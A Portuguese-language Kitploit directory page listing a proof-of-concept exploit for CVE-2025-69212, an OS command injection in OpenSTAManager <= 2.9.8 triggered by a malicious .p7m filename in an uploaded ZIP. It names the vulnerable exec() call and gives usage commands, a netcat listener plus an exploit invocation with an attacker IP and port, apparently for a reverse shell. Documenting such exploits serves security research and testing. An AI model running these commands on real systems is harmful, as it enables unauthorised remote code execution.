Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-69212-PoC — Prova de conceito de exploit para CVE-2025-69212: injeção de comando do sistema operacional no OpenSTAManager <= 2.9.8 através de nome de arquivo .p7m malicioso no upload de ZIP, permitindo execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/tohib09/cve-2025-69212-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubtohib09/cve-2025-69212-poc

CVE-2025-69212-PoC

Prova de conceito de exploit para CVE-2025-69212: injeção de comando do sistema operacional no OpenSTAManager <= 2.9.8 através de nome de arquivo .p7m malicioso no upload de ZIP, permitindo execução remota de código.

Ver Repositório
44há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-69212 — PoC de Injeção de Comandos P7M no OpenSTAManager

OpenSTAManager <= 2.9.8 — Injeção de Comandos do SO através de nome de arquivo .p7m malicioso em upload ZIP.

Arquivo: src/Util/XML.php:100 — $file não sanitizado em exec()
Vetor: /plugins/importFE_ZIP/actions.php → ZIP → nome de arquivo .p7m → exec("openssl smime ... -in \"$file\" ...")

Uso

# Listener
nc -lvnp 4444

# Exploit
python3 CVE-2025-69212.py http://target.htb SUA_PHPSESSID 10.10.14.X 4444

Referências

  • https://github.com/advisories/GHSA-25fp-8w8p-mx36
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69212

CVE-2025-69212-PoC

Baixar ferramenta